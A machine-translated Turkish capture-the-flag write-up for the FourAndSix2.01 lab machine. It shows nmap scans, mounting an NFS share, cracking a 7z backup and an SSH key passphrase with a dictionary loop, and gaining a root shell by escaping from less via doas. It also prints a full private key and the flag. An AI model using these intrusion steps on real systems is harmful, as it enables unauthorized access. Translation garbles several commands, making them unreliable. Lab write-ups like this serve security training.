FourAndSix2.01 drone penetrasyonu
Son zamanlarda kırsal kesimde ağ çok yavaş ve ben sadece hedef makineyle oynayabiliyorum.
Görev: Kök izinleri alın ve /root/flag.txt dosyasını okuyun
Kurulum
Sadece sanal kutuyu doğrudan içe aktarın.
Başlat
Başladıktan sonra hedef makinenin IP adresini görebilirsiniz: 192.168.0.104
# nmap -n -v -Pn -p- -A 192.168.0.104 ... LİMAN DEVLETİ HİZMET NEDENİ VERSİYONU 22 / tcp open ssh syn-ack ttl 64 OpenSSH 7.9 (protokol 2.0) | ssh-hostkey: | 2048 ef: 3b: 2e: cf: 40: 19: 9e: bb: 23: 1e: aa: 24: a1: 09: 4e: d1 (RSA) | 256 c8: 5c: 8b: 0b: e1: 64: 0c: 75: c3: 63: d7: b3: 80: c9: 2f: d2 (ECDSA) | _ 25661: bc: 45: 9a: ba: a5: 47: 20: 60: 13: 25: 19: b0: 47: cb: ad (ED25519) 111 / tcp open rpcbind syn-ack ttl 642 (RPC # 100000) | rpcinfo: | program sürümü bağlantı noktası / protokol hizmeti | 1000002 111 / tcp rpcbind | 1000002 111 / udp rpcbind | 1000032,32049 / tcp nfs | 1000032,32049 / udp nfs | 1000051,3809 / tcp bağlantısı | _ 1000051,3997 / udp bağlantısı 809 / tcp open mountd syn-ack ttl 641-3 (RPC # 100005) 2049 / tcp açık nfs syn-ack ttl 642-3 (RPC # 100003)Bağlantı noktası 2049 NFS hizmeti bulundu.
NFS hizmeti
NFS, Ağ Dosya Sisteminin, yani Ağ Dosya Sisteminin kısaltmasıdır. Sun tarafından geliştirilen ve 1984'te duyurulan, dağıtılmış dosya sistemleri için bir protokol. İşlevi, farklı makinelerin ve farklı işletim sistemlerinin ayrı ayrı verileri ağ üzerinden birbirleriyle paylaşmasına izin vermek ve uygulamaların, istemci tarafındaki ağ üzerinden sunucu diskinde bulunan verilere erişmesine izin vermektir.Unix benzeri sistemler arasında disk dosya paylaşımını sağlamak için bir yöntemdir. .
NFS'nin temel ilkesi, "farklı istemcilerin ve sunucuların bir dizi RPC aracılığıyla aynı dosya sistemini paylaşmasına izin vermektir." İşletim sisteminden bağımsızdır ve farklı donanım ve işletim sistemlerine sahip sistemlerin dosyaları birlikte paylaşmasına izin verir.
NFS, dosya aktarımı veya bilgi aktarımı sırasında RPC protokolüne dayanır. RPC, Uzaktan Prosedür Çağrısı (Uzaktan Prosedür Çağrısı), istemcilerin diğer sistemlerdeki programları yürütmesini sağlayan bir mekanizmadır. NFS'nin kendisi bilgi aktarımı için protokoller ve işlevler sağlamaz, ancak NFS ağ üzerinden veri paylaşmamıza izin verir, çünkü NFS diğer bazı iletim protokollerini kullanır. Bu aktarım protokolleri bu RPC işlevini kullanır. NFS'nin kendisinin RPC kullanan bir program olduğu söylenebilir. Diğer bir deyişle, NFS aynı zamanda bir RPC SUNUCUSudur. Bu nedenle, ister NFS SUNUCUSU ister NFS İSTEMCİSİ olsun, RPC hizmeti NFS'nin kullanıldığı her yerde başlatılmalıdır. Bu şekilde SUNUCU ve MÜŞTERİ, PROGRAM PORT'un yazışmalarını RPC aracılığıyla gerçekleştirebilir. RPC ve NFS arasındaki ilişki şu şekilde anlaşılabilir: NFS bir dosya sistemidir ve RPC bilgi aktarımından sorumludur.
Bağlanabilir dizinleri tespit etmek için nmap komut dosyası kullanın
nmap -sV --script = nfs-showmount 192.168.0.104192.168.0.104 için Nmap tarama raporu Ana bilgisayar çalışıyor (0.00069s gecikme). Gösterilmeyen: 997 kapalı bağlantı noktası LİMAN DEVLETİ HİZMET SÜRÜMÜ 22 / tcp açık ssh OpenSSH 7.9 (protokol 2.0) 111 / tcp açık rpcbind 2 (RPC # 100000) | nfs-showmount: | _ / ev / kullanıcı / depolama | rpcinfo: | program sürümü bağlantı noktası / protokol hizmeti | 1000002 111 / tcp rpcbind | 1000002 111 / udp rpcbind | 1000032,32049 / tcp nfs | 1000032,32049 / udp nfs | 1000051,3685 / tcp bağlantısı | _ 1000051,3869 / udp bağlantısı 2049 / tcp açık nfs 2-3 (RPC # 100003)Mountable dizini / home / user / storage bulundu, sudo nfspysh -o server = 192.168.0.104: / home / user / storage / tmp / test / dizinini bağla
Sıkıştırılmış bir yedekleme paketini görebilirsiniz.7z, 7z ile sıkıştırmayı açmayı deneyin, ancak 7z komutu olmadığını görün, dosyayı yalnızca yerel olarak kaydedebilir ve açabilirsiniz: yedekleme alın. 7z / tmp /
qsNw8ttnhlyM.7z Unzip ve bir şifre bul? ! Şifreyi patlatmak için John aracını kullanın: çikolata alın id_rsa.
----- BAŞLANGIÇ ÖZEL ANAHTARI AÇ ----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCmv / BkXU N5gfqui9Z / 92KAAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX // nOugJPAWyQ1aDMgfAS8zrJh ++ hNeMGCo + TIm9UxVUNwc6vhZ8apKZHOX0Ht + MlHLYdkbwS inmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD + zhaDFyRk5gTqmuFumECDAgCxzeE8 r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGr rWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO + 9wL2q7JeUQB00KLs9 / i RwV6b + kslvHaaQ4TR8IaufuJqmICuE4 + v7HdsQHslmIbPKX6HANnAAADwAO39g1ZtgarNJ 4hcnHTgx / DLgDeet1AhvBBsVjk94i8WLhy0luUvigJcMwHY6MgxL / ZNJfe3cZZ2 / Rpo5g5 j5fzQ8vBHlglN9Z1GPVmeKdUHpRzrLFuARQOitYiWn9suwVafhgTS1hAof3Fqsik3pogEn qp9pm39lalPVNgNVj6HCr2iJ0iq / MXjAmbgYxvpYXhzjyGzfPRlsw3y1T0pIxq3y9AzVBz BCWF9x / GS1mXiDvGbNyb21ymn + NJq1eZKBN2LGJOHV2v + GGBkRTIYDsUpRbN56OJgu7Fyk sECQIARA3ngs7tJhkGwtU7tIihiw / JlRtNu3GZwEsd5RVyX6cK8xGuaqlUulmm5E1CnxXz 3zj8MNhZtpDJaTpda83BhkxkSYb2svJ5rqO8HTYX2XtvPBEAN3U / dbcYVwNIdJ77TmckvS tqvWi + DlZ6SL5Jlsj3WIFwXrmSIUQATA0jcF4d / FOoYOFTAQJ1y2pm97Q8UCErizu + SjfR yQ7Q7QERsuAWBKthTGWkmzWKTYG8cpKso4lwbbjKJapfovEDtJgtFZpaX2 + 2YMMBx5AtaU wNJShNYfIan4d8E2l6R77bBjqff4Qk1EMZzyXhG / Qe63buiCpUk6EevAf5Z2LXHJa4JYW3 PVcSXL3pbAOKEt6c36Q7CMHLmgOR9Be9wU / G + 0FkDhdcgdkfOHaROfbK + RLhZ9tMO2peFP POba2 / Mw / kIK2Tepw7dQMvZ8KU + rBISeTE0YoSNYpt5A7ClskeLsXh9KCA / 6Glnw + xKS + K ewK2ooDck0EwHUmVQqC4qkXzbPbcj37WwMO3mzcQo7MARluOX8Y5b6JReqdhzvM5S7 / uOb cIblXwq9h71gTPirzhnn9gomeryJ / DnbGX4Ww7m8nkFkf9qwghWM + vKMjTxGSFHFXubk8l + 5CG fAOYC1igZMjKO5 + 2u60LMhtPjkGdUMbq0hv2FCxZW1ajlGwZIYWs2MLW7LGVSwC7re + fM21RaMxWvn73VjjooB + 7hexe7l35mr5TyaZcQKCtJSNQRrGsSxHLUTEtvLY9FHOCnLgcsUzi Tm826t9dvsrYHJh8W / wSqSYQ9t1niLg2MulioK6H8FTDAupkhZUkkbL0FEbe + Dl3cIeUW6 nXgaf6F + 9tQHNQCI9QT1a / kGSGgQRRjuSdmVZieqdafJ7jHavLjzjcsiKQtjzkyaCp1hpa dS6IZqF9DzlbtJRNlrO6Tq3j7gtL4DCURx2Jq13JO1hWDffIyrRZfgGeovGK / UAbTeTQ9M rPy1AS6A == ----- END OPENSSH ÖZEL ANAHTAR -----id_rsa.pub:
SSH-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX // nOugJPAWyQ1aDMgfAS8zrJh ++ hNeMGCo + TIm9UxVUNwc6vhZ8apKZHOX0Ht + MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD + zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO + 9wL2q7JeUQB00KLs9 / iRwV6b + kslvHaaQ4TR8IaufuJqmICuE4 + v7HdsQHslmIbPKX6HANn kullanıcı @ fourandsix2Şifreyi patlatmak için komut dosyası kullanın:
cat /home/threst/Pentest/Dictionary/password.txt | okurken geçiş; ssh-keygen -c -C user@192.168.0.105 -P $ pass -f id_rsa ise yapın > / dev / null; sonra echo $ pass; break; fi; bitti12345678 şifresini alın:
Not: Burada sanal makineyi yeniden başlattım, böylece ip 192.168.0.105 oldu.
Kök klasöre doğrudan erişemediğimi fark ettim, bu yüzden / etc dizinine baktım. Sudo'yu yalnızca kök parolasını hatırlamamak için kullanan çoğu kişisel bilgisayar kullanıcısı için OpenBSD'den gelen doas'lar karmaşık sudo'dan (sudo Derlemeden sonraki hacim doas'ın beş katıdır), yapılandırma daha basittir ve bir dereceye kadar daha güvenlidir (açıkçası, daha fazla kod, güvenlik açığı olasılığı da artar, bu aynı zamanda OpenBSD'nin tasarımının arkasındaki teoridir). Yazar, sudo'nun karmaşıklığı nedeniyle yapılandırma biçimini sık sık değiştirmenin baş ağrısından sonra doas tasarladı ve şimdi Linux'a taşındı. Yapılandırma formatı çok basittir. Çark grubundaki kullanıcıların doas'ı, kök kullanıcı /etc/doas.conf'a yazdığı sürece, kök ayrıcalıklarına sahip komutları çalıştırmak için kullanmalarına izin vermek için:
izin: tekerlekO zaman onu sudo gibi kullanabilirsiniz.
Günlüğü görüntülemek için doas / usr / bin / less / var / log / authlog girin:
V girin, düzenleme moduna girin, şunu girin:! / Bin / sh
Kök izinleri alın, bayrağı kontrol edin: acd043bc3103ed3dd02eee99d5b0ff42
* Yazar: Zhou Taitao, lütfen FreeBuf.COM'dan belirtin
